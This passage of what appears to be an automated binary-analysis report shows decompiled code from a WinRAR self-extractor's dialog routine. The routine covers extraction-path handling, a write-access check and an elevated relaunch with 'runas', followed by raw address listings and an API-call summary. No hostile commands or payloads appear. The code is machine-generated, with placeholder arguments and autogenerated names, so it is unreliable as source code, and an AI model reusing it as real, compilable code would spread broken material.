								 *0xd08454 = _t293;
								L24:
								_push(_t293);
								L25:
								EndDialog(_t311, ??); // executed
								goto L128;
							}
							goto L103;
						}
					}
				}
				if(_t316 != 1) {
					L6:
					_t106 = 0;
					goto L129;
				}
				_t152 = ( *(_t328 + 0x10) & 0x0000ffff) - 1;
				if(_t152 == 0) {
					__eflags =  *0xd08455;
					if( *0xd08455 != 0) {
						L21:
						GetDlgItemTextW(_t311, 0x66, _t328 - 0x2474, 0x800);
						__eflags =  *0xd08455;
						if( *0xd08455 == 0) {
							__eflags =  *0xd08456;
							if( *0xd08456 == 0) {
								_t155 = GetDlgItem(_t311, 0x68);
								__eflags =  *0xd0845c;
								_t320 = _t155;
								if( *0xd0845c == 0) {
									SendMessageW(_t320, 0xb1, 0, 0xffffffff);
									SendMessageW(_t320, 0xc2, 0, 0xcf35f4);
								}
								SetFocus(_t320);
								__eflags =  *0xd09468;
								if( *0xd09468 == 0) {
									_t321 = 0x800;
									E00CD0602(_t328 - 0x1474, _t328 - 0x2474, 0x800);
									E00CDD453(_t296, _t328 - 0x1474, 0x800);
									E00CC4092(_t328 - 0x4974, 0x880, E00CCE617(0xb9), _t328 - 0x1474);
									_t330 = _t330 + 0x10;
									_push(_t328 - 0x4974);
									_push(0);
									E00CDD4D4();
								} else {
									_push(E00CCE617(0xba));
									_push(0);
									E00CDD4D4();
									_t321 = 0x800;
								}
								__eflags =  *0xd0a471;
								if( *0xd0a471 == 0) {
									E00CDDB4B(_t328 - 0x2474);
								}
								 *(_t328 - 0xd) = 0;
								E00CCA0B1(_t293, _t296, _t311, _t328, _t328 - 0x2474, 0, 0);
								__eflags = 0;
								if(0 != 0) {
									L39:
									_t302 = E00CDAC04(_t328 - 0x2474);
									 *((char*)(_t328 - 0xe)) = _t302;
									__eflags = _t302;
									if(_t302 == 0) {
										_t263 = GetLastError();
										_t302 =  *((intOrPtr*)(_t328 - 0xe));
										__eflags = _t263 - 5;
										if(_t263 == 5) {
											 *(_t328 - 0xd) = _t293;
										}
									}
									_t173 =  *0xd0a471;
									__eflags = _t173;
									if(_t173 != 0) {
										L48:
										__eflags =  *((char*)(_t328 - 0xe));
										if( *((char*)(_t328 - 0xe)) != 0) {
											 *0xd0844c = _t293;
											E00CC12F1(_t311, 0x67, 0);
											E00CC12F1(_t311, 0x66, 0);
											SetDlgItemTextW(_t311, _t293, E00CCE617(0xe6)); // executed
											E00CC12F1(_t311, 0x69, _t293);
											SetDlgItemTextW(_t311, 0x65, 0xcf35f4); // executed
											_t322 = GetDlgItem(_t311, 0x65);
											__eflags = _t322;
											if(_t322 != 0) {
												_t210 = GetWindowLongW(_t322, 0xfffffff0) | 0x00000080;
												__eflags = _t210;
												SetWindowLongW(_t322, 0xfffffff0, _t210);
											}
											_push(5);
											_push( *0xd1fc90);
											_push(_t311);
											E00CDC73F(_t309, _t311);
											_push(2);
											_push( *0xd1fc90);
											_push(_t311);
											E00CDC73F(_t309, _t311);
											_push(0xd1ec90);
											_push(_t311);
											 *0xd21cbc = _t293; // executed
											E00CDDA52(_t302, _t309, __eflags); // executed
											_push(6);
											_push( *0xd1fc90);
											 *0xd21cbc = 0;
											_push(_t311);
											E00CDC73F(_t309, _t311);
											__eflags =  *0xd08454;
											if( *0xd08454 == 0) {
												__eflags =  *0xd0845c;
												if( *0xd0845c == 0) {
													__eflags =  *0xd1fcac;
													if( *0xd1fcac == 0) {
														_push(4);
														_push( *0xd1fc90);
														_push(_t311); // executed
														E00CDC73F(_t309, _t311); // executed
													}
												}
											}
											E00CC12D3(_t311, _t293, _t293);
											 *0xd0844c =  *0xd0844c & 0x00000000;
											__eflags =  *0xd0844c;
											_t186 =  *0xd08454; // 0x1
											goto L73;
										}
										__eflags = _t173;
										if(_t173 != 0) {
											goto L65;
										}
										goto L50;
									} else {
										__eflags = _t302;
										if(_t302 == 0) {
											L50:
											_t220 =  *(_t328 - 0xd);
											__eflags = _t220;
											 *(_t328 - 0xd) = _t220 == 0;
											__eflags = _t220;
											if(_t220 == 0) {
												L64:
												__eflags =  *(_t328 - 0xd);
												if( *(_t328 - 0xd) == 0) {
													L11:
													_push(0);
													goto L25;
												}
												L65:
												_push(E00CCE617(0x9a));
												E00CC4092(_t328 - 0x3874, 0xa00, L"\"%s\"\n%s", _t328 - 0x2474);
												E00CC6D83(0xd01098, _t293);
												E00CDA7E4(_t311, _t328 - 0x3874, E00CCE617(0x96), 0x30);
												 *0xd0845c =  *0xd0845c + 1;
												goto L11;
											}
											GetModuleFileNameW(0, _t328 - 0x3474, _t321);
											E00CCF28C(0xd0c472, _t328 - 0x574, 0x80);
											_push(0xd0b472);
											E00CC4092(_t328 - 0xfe8c, 0x430c, L"-el -s2 \"-d%s\" \"-sp%s\"", _t328 - 0x2474);
											_t330 = _t330 + 0x14;
											 *(_t328 - 0x58) = 0x3c;
											 *((intOrPtr*)(_t328 - 0x54)) = 0x40;
											 *((intOrPtr*)(_t328 - 0x48)) = _t328 - 0x3474;
											 *((intOrPtr*)(_t328 - 0x44)) = _t328 - 0xfe8c;
											 *(_t328 - 0x50) = _t311;
											 *((intOrPtr*)(_t328 - 0x4c)) = L"runas";
											 *(_t328 - 0x3c) = _t293;
											 *((intOrPtr*)(_t328 - 0x38)) = 0;
											 *((intOrPtr*)(_t328 - 0x40)) = 0xd08468;
											_t325 = CreateFileMappingW(0xffffffff, 0, 0x8000004, 0, 0x7104, L"winrarsfxmappingfile.tmp");
											 *(_t328 - 0x14) = _t325;
											__eflags = _t325;
											if(_t325 == 0) {
												 *(_t328 - 0x1c) =  *(_t328 - 0x14);
											} else {
												 *0xd17b80 = 0;
												_t245 = GetCommandLineW();
												__eflags = _t245;
												if(_t245 != 0) {
													E00CD0602(0xd17b82, _t245, 0x2000);
												}
												E00CDB425(0xd0c472, 0xd1bb82, 7);
												E00CDB425(0xd0c472, 0xd1cb82, 2);
												E00CDB425(0xd0c472, 0xd1db82, 0x10);
												 *0xd1ec83 = _t293;
												E00CCF3FA(_t293, 0xd1eb82, _t328 - 0x574);
												 *(_t328 - 0x1c) = MapViewOfFile(_t325, 2, 0, 0, 0);
												E00CE0320(_t252, 0xd17b80, 0x7104);
												_t330 = _t330 + 0xc;
											}
											_t234 = ShellExecuteExW(_t328 - 0x58);
											E00CCF445(_t328 - 0x574, 0x80);
											E00CCF445(_t328 - 0xfe8c, 0x430c);
											__eflags = _t234;
											if(_t234 == 0) {
												_t327 =  *(_t328 - 0x1c);
												 *(_t328 - 0xd) = _t293;
												goto L62;
											} else {
												 *0xd230a4( *(_t328 - 0x20), 0x2710);
												_t67 = _t328 - 0x18;
												 *_t67 =  *(_t328 - 0x18) & 0x00000000;
												__eflags =  *_t67;
												_t327 =  *(_t328 - 0x1c);
												while(1) {
													__eflags =  *_t327;
													if( *_t327 != 0) {
														break;
													}
													Sleep(0x64);
													_t244 =  *(_t328 - 0x18) + 1;
													 *(_t328 - 0x18) = _t244;
													__eflags = _t244 - 0x64;
													if(_t244 < 0x64) {
														continue;
													}
													break;
												}
												 *0xd1fcac =  *(_t328 - 0x20);
												L62:
												__eflags =  *(_t328 - 0x14);
												if( *(_t328 - 0x14) != 0) {
													UnmapViewOfFile(_t327);
													CloseHandle( *(_t328 - 0x14));
												}
												goto L64;
											}
										}
										E00CC4092(_t328 - 0x1474, _t321, L"__tmp_rar_sfx_access_check_%u", GetTickCount());
										_t330 = _t330 + 0x10;
										E00CC9556(_t328 - 0x34ac);
										 *(_t328 - 4) =  *(_t328 - 4) & 0x00000000;
										_t260 = E00CC966E(_t328 - 0x34ac, _t328 - 0x1474, 0x11);
										 *((char*)(_t328 - 0xe)) = _t260;
										__eflags = _t260;
										if(_t260 == 0) {
											_t262 = GetLastError();
											__eflags = _t262 - 5;
											if(_t262 == 5) {
												 *(_t328 - 0xd) = _t293;
											}
										}
										_t37 = _t328 - 4;
										 *_t37 =  *(_t328 - 4) | 0xffffffff;
										__eflags =  *_t37;
										_t302 = _t328 - 0x34ac;
										E00CC959A(_t328 - 0x34ac); // executed
										_t173 =  *0xd0a471;
										goto L48;
									}
								} else {
									_t264 = GetLastError();
									__eflags = _t264 - 5;
									if(_t264 == 5) {
										L38:
										 *(_t328 - 0xd) = _t293;
										goto L39;
									}
									__eflags = _t264 - 3;
									if(_t264 != 3) {
										goto L39;
									}
									goto L38;
								}
							} else {
								_t186 = _t293;
								 *0xd08454 = _t186;
								L73:
								__eflags =  *0xd0845c;
								if( *0xd0845c <= 0) {
									goto L24;
								}
								__eflags = _t186;
								if(_t186 != 0) {
									goto L24;
								}
								 *0xd08455 = _t293;
								SetDlgItemTextW(_t311, _t293, E00CCE617(0x90));
								_t323 =  *0xd01098;
								__eflags = _t323 - 9;
								if(_t323 != 9) {
									__eflags = _t323 - 3;
									_t193 = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
									__eflags = ((_t323 != 0x00000003) - 0x00000001 & 0x0000000b) + 0x97;
								} else {
									_t193 = 0xa0;
								}
								E00CD0602(_t328 - 0x474, E00CCE617(_t193), 0x200);
								__eflags = _t323 - 9;
								if(_t323 == 9) {
									__eflags =  *0xd0c574;
									if( *0xd0c574 != 0) {
										_t201 = E00CE3E13(_t328 - 0x474);
										_t202 = E00CCE617(0xa1);
										__eflags = 0x200;
										E00CC4092(_t328 - 0x474 + _t201 * 2, 0x200 - _t201, L"\n%s", _t202);
									}
								}
								E00CDA7E4(_t311, _t328 - 0x474, E00CCE617(0x96), 0x30);
								goto L128;
							}
						}
						_t293 = 1;
						__eflags =  *0xd08456;
						if( *0xd08456 == 0) {
							goto L24;
						}
						goto L23;
					}
					__eflags =  *0xd21cbc;
					if( *0xd21cbc == 0) {
						goto L21;
					} else {
						__eflags =  *0xd21cbd;
						 *0xd21cbd = _t152 & 0xffffff00 |  *0xd21cbd == 0x00000000;
						SetDlgItemTextW(_t311, 1, E00CCE617(((_t152 & 0xffffff00 |  *0xd21cbd == 0x00000000) & 0x000000ff) + 0xe6));
						while(1) {
							__eflags =  *0xd21cbd;
							if( *0xd21cbd == 0) {
								goto L128;
							}
							__eflags =  *0xd08454;
							if( *0xd08454 != 0) {
								goto L128;
							}
							_t278 = GetMessageW(_t328 - 0x74, 0, 0, 0);
							__eflags = _t278;
							if(_t278 == 0) {
								goto L128;
							} else {
								_t280 = IsDialogMessageW(_t311, _t328 - 0x74);
								__eflags = _t280;
								if(_t280 == 0) {
									TranslateMessage(_t328 - 0x74);
									DispatchMessageW(_t328 - 0x74);
								}
								continue;
							}
						}
						goto L128;
					}
				}
				_t285 = _t152 - 1;
				if(_t285 == 0) {
					__eflags =  *0xd0844c;
					 *0xd08454 = 1;
					if( *0xd0844c == 0) {
						goto L11;
					}
					__eflags =  *0xd0845c;
					if( *0xd0845c != 0) {
						goto L128;
					}
					goto L11;
				}
				if(_t285 == 0x65) {
					_push(0x800);
					_t289 = E00CC124F(_t311, E00CCE617(0x64), _t328 - 0x1474);
					__eflags = _t289;
					if(_t289 == 0) {
						goto L128;
					} else {
						_push(_t328 - 0x1474);
						_push(0x66);
						goto L127;
					}
				}
				goto L6;
			}




















































                                                    0x00cdb7e0
                                                    0x00cdb7e0
                                                    0x00cdb7e5
                                                    0x00cdb7ef
                                                    0x00cdb7f6
                                                    0x00cdb7fa
                                                    0x00cdb80e
                                                    0x00cdb815
                                                    0x00cdb818
                                                    0x00cdc203
                                                    0x00cdc203
                                                    0x00cdc205
                                                    0x00cdc20b
                                                    0x00cdc213
                                                    0x00cdc213
                                                    0x00cdb81e
                                                    0x00cdb824
                                                    0x00cdbf0f
                                                    0x00cdbf10
                                                    0x00cdbf15
                                                    0x00cdbf1a
                                                    0x00cdbf20
                                                    0x00cdbf26
                                                    0x00cdbf28
                                                    0x00cdbf32
                                                    0x00cdbf32
                                                    0x00cdbf38
                                                    0x00cdbf3d
                                                    0x00cdbf3f
                                                    0x00cdbf4c
                                                    0x00cdbf4c
                                                    0x00cdbf55
                                                    0x00cdbf68
                                                    0x00cdbf6b
                                                    0x00cdbf7d
                                                    0x00cdbf85
                                                    0x00cdbf8b
                                                    0x00cdbf93
                                                    0x00cdbf95
                                                    0x00cdbf98
                                                    0x00cdbf9d
                                                    0x00cdbf9f
                                                    0x00cdbf9f
                                                    0x00cdbfa7
                                                    0x00cdbfae
                                                    0x00cdbfb3
                                                    0x00cdbfb8
                                                    0x00cdbfbd
                                                    0x00cdbfc2
                                                    0x00cdbfc3
                                                    0x00cdbfca
                                                    0x00cdbfcf
                                                    0x00cdbfd1
                                                    0x00cdbfd3
                                                    0x00cdbfd3
                                                    0x00cdbfd9
                                                    0x00cdbfe0
                                                    0x00cdbfe2
                                                    0x00cdbfe4
                                                    0x00cdbfea
                                                    0x00cdbfeb
                                                    0x00cdbfeb
                                                    0x00cdbff0
                                                    0x00cdbff7
                                                    0x00cdc007
                                                    0x00cdc01a
                                                    0x00cdc01a
                                                    0x00cdc020
                                                    0x00cdc027
                                                    0x00cdc0d8
                                                    0x00cdc0d8
                                                    0x00cdc0df
                                                    0x00cdc18b
                                                    0x00cdc18b
                                                    0x00cdc192
                                                    0x00cdc197
                                                    0x00cdc197
                                                    0x00cdc19d
                                                    0x00cdc1a4
                                                    0x00cdc1ab
                                                    0x00cdc1b5
                                                    0x00cdc1b5
                                                    0x00cdc1ba
                                                    0x00cdc1bf
                                                    0x00cdc1c1
                                                    0x00cdc1c3
                                                    0x00cdc1ca
                                                    0x00cdc1cc
                                                    0x00cdc1ce
                                                    0x00cdc1cf
                                                    0x00cdc1d4
                                                    0x00cdc1d5
                                                    0x00cdc1d7
                                                    0x00cdc1e1
                                                    0x00cdc1d9
                                                    0x00cdc1d9
                                                    0x00cdc1d9
                                                    0x00cdc1d7
                                                    0x00cdc1ca
                                                    0x00cdc1e7
                                                    0x00cdc1ee
                                                    0x00cdc1fa
                                                    0x00cdc1fb
                                                    0x00cdc1fc
                                                    0x00cdc1fd
                                                    0x00cdc1fd
                                                    0x00000000
                                                    0x00cdc1ee
                                                    0x00cdc0e5
                                                    0x00cdc0ec
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc0f2
                                                    0x00cdc0f9
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc0ff
                                                    0x00cdc101
                                                    0x00cdc106
                                                    0x00cdc106
                                                    0x00cdc10d
                                                    0x00cdc10d
                                                    0x00cdc10d
                                                    0x00cdc10d
                                                    0x00cdc113
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc115
                                                    0x00cdc11c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc11e
                                                    0x00cdc11e
                                                    0x00cdc124
                                                    0x00cdc132
                                                    0x00cdc143
                                                    0x00cdc15b
                                                    0x00000000
                                                    0x00cdc15b
                                                    0x00cdc126
                                                    0x00cdc12d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc12f
                                                    0x00cdc12f
                                                    0x00cdc160
                                                    0x00cdc161
                                                    0x00cdc161
                                                    0x00cdc169
                                                    0x00cdc183
                                                    0x00cdc188
                                                    0x00000000
                                                    0x00cdc02d
                                                    0x00cdc02d
                                                    0x00cdc02f
                                                    0x00cdc035
                                                    0x00cdc036
                                                    0x00cdc03b
                                                    0x00cdc040
                                                    0x00cdc042
                                                    0x00cdc044
                                                    0x00cdc04b
                                                    0x00cdc04d
                                                    0x00cdc061
                                                    0x00cdc06c
                                                    0x00cdc071
                                                    0x00cdc04b
                                                    0x00cdc072
                                                    0x00cdc078
                                                    0x00cdc0cb
                                                    0x00cdc0cb
                                                    0x00cdc0cc
                                                    0x00cdc0d2
                                                    0x00cdc0d3
                                                    0x00000000
                                                    0x00cdc07a
                                                    0x00cdc07b
                                                    0x00cdc081
                                                    0x00cdc087
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc089
                                                    0x00cdc090
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc092
                                                    0x00cdc094
                                                    0x00cdc09a
                                                    0x00cdc09b
                                                    0x00cdc0a0
                                                    0x00cdc0a7
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc0bd
                                                    0x00cdc0c3
                                                    0x00cdc0c5
                                                    0x00cdb958
                                                    0x00cdb958
                                                    0x00cdb95e
                                                    0x00cdb95e
                                                    0x00cdb95f
                                                    0x00cdb960
                                                    0x00000000
                                                    0x00cdb960
                                                    0x00000000
                                                    0x00cdc0c5
                                                    0x00cdc078
                                                    0x00cdc027
                                                    0x00cdb82c
                                                    0x00cdb841
                                                    0x00cdb841
                                                    0x00000000
                                                    0x00cdb841
                                                    0x00cdb834
                                                    0x00cdb836
                                                    0x00cdb89b
                                                    0x00cdb8a2
                                                    0x00cdb92e
                                                    0x00cdb93d
                                                    0x00cdb943
                                                    0x00cdb94a
                                                    0x00cdb96b
                                                    0x00cdb972
                                                    0x00cdb983
                                                    0x00cdb989
                                                    0x00cdb990
                                                    0x00cdb992
                                                    0x00cdb99e
                                                    0x00cdb9b1
                                                    0x00cdb9b1
                                                    0x00cdb9b8
                                                    0x00cdb9be
                                                    0x00cdb9c5
                                                    0x00cdb9e0
                                                    0x00cdb9f4
                                                    0x00cdba01
                                                    0x00cdba24
                                                    0x00cdba29
                                                    0x00cdba32
                                                    0x00cdba33
                                                    0x00cdba35
                                                    0x00cdb9c7
                                                    0x00cdb9d1
                                                    0x00cdb9d2
                                                    0x00cdb9d4
                                                    0x00cdb9d9
                                                    0x00cdb9d9
                                                    0x00cdba3a
                                                    0x00cdba41
                                                    0x00cdba4a
                                                    0x00cdba4a
                                                    0x00cdba53
                                                    0x00cdba5f
                                                    0x00cdba64
                                                    0x00cdba66
                                                    0x00cdba7b
                                                    0x00cdba87
                                                    0x00cdba89
                                                    0x00cdba8c
                                                    0x00cdba8e
                                                    0x00cdba90
                                                    0x00cdba96
                                                    0x00cdba99
                                                    0x00cdba9c
                                                    0x00cdba9e
                                                    0x00cdba9e
                                                    0x00cdba9c
                                                    0x00cdbaa1
                                                    0x00cdbaa6
                                                    0x00cdbaa8
                                                    0x00cdbb16
                                                    0x00cdbb16
                                                    0x00cdbb1a
                                                    0x00cdbd5b
                                                    0x00cdbd61
                                                    0x00cdbd6b
                                                    0x00cdbd7d
                                                    0x00cdbd87
                                                    0x00cdbd94
                                                    0x00cdbda3
                                                    0x00cdbda5
                                                    0x00cdbda7
                                                    0x00cdbdb2
                                                    0x00cdbdb2
                                                    0x00cdbdbb
                                                    0x00cdbdbb
                                                    0x00cdbdc1
                                                    0x00cdbdc3
                                                    0x00cdbdc9
                                                    0x00cdbdca
                                                    0x00cdbdcf
                                                    0x00cdbdd1
                                                    0x00cdbdd7
                                                    0x00cdbdd8
                                                    0x00cdbddd
                                                    0x00cdbde2
                                                    0x00cdbde3
                                                    0x00cdbde9
                                                    0x00cdbdee
                                                    0x00cdbdf0
                                                    0x00cdbdf6
                                                    0x00cdbdfd
                                                    0x00cdbdfe
                                                    0x00cdbe03
                                                    0x00cdbe0a
                                                    0x00cdbe0c
                                                    0x00cdbe13
                                                    0x00cdbe15
                                                    0x00cdbe1c
                                                    0x00cdbe1e
                                                    0x00cdbe20
                                                    0x00cdbe26
                                                    0x00cdbe27
                                                    0x00cdbe27
                                                    0x00cdbe1c
                                                    0x00cdbe13
                                                    0x00cdbe2f
                                                    0x00cdbe34
                                                    0x00cdbe34
                                                    0x00cdbe3b
                                                    0x00000000
                                                    0x00cdbe3b
                                                    0x00cdbb20
                                                    0x00cdbb22
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdbaaa
                                                    0x00cdbaaa
                                                    0x00cdbaac
                                                    0x00cdbb28
                                                    0x00cdbb28
                                                    0x00cdbb2b
                                                    0x00cdbb2d
                                                    0x00cdbb31
                                                    0x00cdbb33
                                                    0x00cdbcf1
                                                    0x00cdbcf1
                                                    0x00cdbcf5
                                                    0x00cdb894
                                                    0x00cdb894
                                                    0x00000000
                                                    0x00cdb894
                                                    0x00cdbcfb
                                                    0x00cdbd05
                                                    0x00cdbd1e
                                                    0x00cdbd2c
                                                    0x00cdbd46
                                                    0x00cdbd4b
                                                    0x00000000
                                                    0x00cdbd4b
                                                    0x00cdbb43
                                                    0x00cdbb5a
                                                    0x00cdbb5f
                                                    0x00cdbb7c
                                                    0x00cdbb81
                                                    0x00cdbb84
                                                    0x00cdbb91
                                                    0x00cdbb98
                                                    0x00cdbba1
                                                    0x00cdbbb9
                                                    0x00cdbbbc
                                                    0x00cdbbc3
                                                    0x00cdbbc6
                                                    0x00cdbbc9
                                                    0x00cdbbd6
                                                    0x00cdbbd8
                                                    0x00cdbbdb
                                                    0x00cdbbdd
                                                    0x00cdbc68
                                                    0x00cdbbe3
                                                    0x00cdbbe3
                                                    0x00cdbbea
                                                    0x00cdbbf0
                                                    0x00cdbbf2
                                                    0x00cdbbff
                                                    0x00cdbbff
                                                    0x00cdbc0b
                                                    0x00cdbc17
                                                    0x00cdbc23
                                                    0x00cdbc2e
                                                    0x00cdbc3a
                                                    0x00cdbc58
                                                    0x00cdbc5b
                                                    0x00cdbc60
                                                    0x00cdbc60
                                                    0x00cdbc6f
                                                    0x00cdbc83
                                                    0x00cdbc94
                                                    0x00cdbc99
                                                    0x00cdbc9b
                                                    0x00cdbcd5
                                                    0x00cdbcd8
                                                    0x00000000
                                                    0x00cdbc9d
                                                    0x00cdbca5
                                                    0x00cdbcab
                                                    0x00cdbcab
                                                    0x00cdbcab
                                                    0x00cdbcaf
                                                    0x00cdbcb2
                                                    0x00cdbcb2
                                                    0x00cdbcb5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdbcb9
                                                    0x00cdbcc2
                                                    0x00cdbcc3
                                                    0x00cdbcc6
                                                    0x00cdbcc9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdbcc9
                                                    0x00cdbcce
                                                    0x00cdbcdb
                                                    0x00cdbcdb
                                                    0x00cdbcdf
                                                    0x00cdbce2
                                                    0x00cdbceb
                                                    0x00cdbceb
                                                    0x00000000
                                                    0x00cdbcdf
                                                    0x00cdbc9b
                                                    0x00cdbac2
                                                    0x00cdbac7
                                                    0x00cdbad0
                                                    0x00cdbad5
                                                    0x00cdbae8
                                                    0x00cdbaed
                                                    0x00cdbaf0
                                                    0x00cdbaf2
                                                    0x00cdbaf4
                                                    0x00cdbafa
                                                    0x00cdbafd
                                                    0x00cdbaff
                                                    0x00cdbaff
                                                    0x00cdbafd
                                                    0x00cdbb02
                                                    0x00cdbb02
                                                    0x00cdbb02
                                                    0x00cdbb06
                                                    0x00cdbb0c
                                                    0x00cdbb11
                                                    0x00000000
                                                    0x00cdbb11
                                                    0x00cdba68
                                                    0x00cdba68
                                                    0x00cdba6e
                                                    0x00cdba71
                                                    0x00cdba78
                                                    0x00cdba78
                                                    0x00000000
                                                    0x00cdba78
                                                    0x00cdba73
                                                    0x00cdba76
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdba76
                                                    0x00cdb974
                                                    0x00cdb974
                                                    0x00cdb976
                                                    0x00cdbe40
                                                    0x00cdbe40
                                                    0x00cdbe47
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdbe4d
                                                    0x00cdbe4f
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdbe5a
                                                    0x00cdbe68
                                                    0x00cdbe6e
                                                    0x00cdbe74
                                                    0x00cdbe77
                                                    0x00cdbe82
                                                    0x00cdbe8c
                                                    0x00cdbe8c
                                                    0x00cdbe79
                                                    0x00cdbe79
                                                    0x00cdbe79
                                                    0x00cdbea4
                                                    0x00cdbea9
                                                    0x00cdbeac
                                                    0x00cdbeae
                                                    0x00cdbeb5
                                                    0x00cdbebe
                                                    0x00cdbecb
                                                    0x00cdbed6
                                                    0x00cdbee8
                                                    0x00cdbeed
                                                    0x00cdbeb5
                                                    0x00cdbf05
                                                    0x00000000
                                                    0x00cdbf05
                                                    0x00cdb972
                                                    0x00cdb94e
                                                    0x00cdb94f
                                                    0x00cdb956
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb956
                                                    0x00cdb8a8
                                                    0x00cdb8af
                                                    0x00000000
                                                    0x00cdb8b1
                                                    0x00cdb8b1
                                                    0x00cdb8bb
                                                    0x00cdb8d1
                                                    0x00cdb920
                                                    0x00cdb920
                                                    0x00cdb927
                                                    0x00cdb929
                                                    0x00cdb929
                                                    0x00cdb8d9
                                                    0x00cdb8e0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb8ef
                                                    0x00cdb8f5
                                                    0x00cdb8f7
                                                    0x00000000
                                                    0x00cdb8fd
                                                    0x00cdb902
                                                    0x00cdb908
                                                    0x00cdb90a
                                                    0x00cdb910
                                                    0x00cdb91a
                                                    0x00cdb91a
                                                    0x00000000
                                                    0x00cdb90a
                                                    0x00cdb8f7
                                                    0x00000000
                                                    0x00cdb920
                                                    0x00cdb8af
                                                    0x00cdb838
                                                    0x00cdb83a
                                                    0x00cdb878
                                                    0x00cdb87f
                                                    0x00cdb885
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb887
                                                    0x00cdb88e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdb88e
                                                    0x00cdb83f
                                                    0x00cdb848
                                                    0x00cdb85d
                                                    0x00cdb862
                                                    0x00cdb864
                                                    0x00000000
                                                    0x00cdb86a
                                                    0x00cdb870
                                                    0x00cdb871
                                                    0x00000000
                                                    0x00cdb871
                                                    0x00cdb864
                                                    0x00000000

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CDB7E5
                                                      • Part of subcall function 00CC1316: GetDlgItem.USER32(00000000,00003021), ref: 00CC135A
                                                      • Part of subcall function 00CC1316: SetWindowTextW.USER32(00000000,00CF35F4), ref: 00CC1370
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDB8D1
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB8EF
                                                    • IsDialogMessageW.USER32(?,?), ref: 00CDB902
                                                    • TranslateMessage.USER32(?), ref: 00CDB910
                                                    • DispatchMessageW.USER32(?), ref: 00CDB91A
                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00CDB93D
                                                    • EndDialog.USER32(?,00000001), ref: 00CDB960
                                                    • GetDlgItem.USER32(?,00000068), ref: 00CDB983
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDB99E
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDB9B1
                                                      • Part of subcall function 00CDD453: _wcslen.LIBCMT ref: 00CDD47D
                                                    • SetFocus.USER32(00000000), ref: 00CDB9B8
                                                    • _swprintf.LIBCMT ref: 00CDBA24
                                                      • Part of subcall function 00CC4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CC40A5
                                                      • Part of subcall function 00CDD4D4: GetDlgItem.USER32(00000068,00D1FCB8), ref: 00CDD4E8
                                                      • Part of subcall function 00CDD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00CDAF07,00000001,?,?,00CDB7B9,00CF506C,00D1FCB8,00D1FCB8,00001000,00000000,00000000), ref: 00CDD510
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00CDD51B
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF35F4), ref: 00CDD529
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD53F
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00CDD559
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD59D
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00CDD5AB
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00CDD5BA
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00CDD5E1
                                                      • Part of subcall function 00CDD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00CF43F4), ref: 00CDD5F0
                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00CDBA68
                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00CDBA90
                                                    • GetTickCount.KERNEL32 ref: 00CDBAAE
                                                    • _swprintf.LIBCMT ref: 00CDBAC2
                                                    • GetLastError.KERNEL32(?,00000011), ref: 00CDBAF4
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00CDBB43
                                                    • _swprintf.LIBCMT ref: 00CDBB7C
                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00CDBBD0
                                                    • GetCommandLineW.KERNEL32 ref: 00CDBBEA
                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00CDBC47
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00CDBC6F
                                                    • Sleep.KERNEL32(00000064), ref: 00CDBCB9
                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00CDBCE2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CDBCEB
                                                    • _swprintf.LIBCMT ref: 00CDBD1E
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00CDBD7D
                                                    • SetDlgItemTextW.USER32(?,00000065,00CF35F4), ref: 00CDBD94
                                                    • GetDlgItem.USER32(?,00000065), ref: 00CDBD9D
